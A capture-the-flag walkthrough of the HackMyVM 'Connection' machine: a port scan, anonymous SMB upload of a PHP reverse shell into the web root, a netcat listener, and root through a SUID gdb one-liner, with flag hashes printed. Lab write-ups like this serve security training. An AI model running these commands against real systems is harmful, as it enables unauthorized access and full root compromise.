HackMyVM - Connection

Connection

Connection

scan

1
2
3
4
5
6
7
❯ rustscan -a  192.168.0.104
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack

web

1
2
3
4
5
6
❯ gobuster dir -u http://192.168.0.104 -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status (Status: 403) [Size: 278]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

smb

file upload

reverseShell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
❯ smbclient --list=192.168.0.104 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

Sharename Type Comment
--------- ---- -------
share Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❯ enum4linux -a -o 192.168.0.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug 8 17:47:46 2025

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

❯ smbclient //192.168.0.104/share -N
smb: \> cd html
smb: \html\> ls
index.html N 10701 Wed Sep 23 09:48:45 2020

smb: \html\> put reverseShell.php
putting file reverseShell.php as \html everseShell.php (3818.0 kb/s) (average 3818.4 kb/s)
smb: \html\> ls
. D 0 Fri Aug 8 18:12:41 2025
.. D 0 Wed Sep 23 09:48:39 2020
index.html N 10701 Wed Sep 23 09:48:45 2020
reverseShell.php A 3910 Fri Aug 8 18:12:41 2025

suid gdb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
❯ rlwrap nc -lvnp 8848
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty; pty.spawn('/bin/bash');"

www-data@connection:/home/connection$ cat local.txt
cat local.txt
3f491443a2a6aa82bc86a3cda8c39617

www-data@connection:/$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 8008480 Oct 14 2019 /usr/bin/gdb
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign

www-data@connection:/$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
# cd root
cd root
# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Sep 22 2020 .
drwxr-xr-x 18 root root 4096 Sep 22 2020 ..
lrwxrwxrwx 1 root root 9 Sep 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Sep 22 2020 .local
lrwxrwxrwx 1 root root 9 Sep 22 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 Sep 22 2020 proof.txt
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cat proof.txt
cat proof.txt
a7c6ea4931ab86fb54c5400204474a39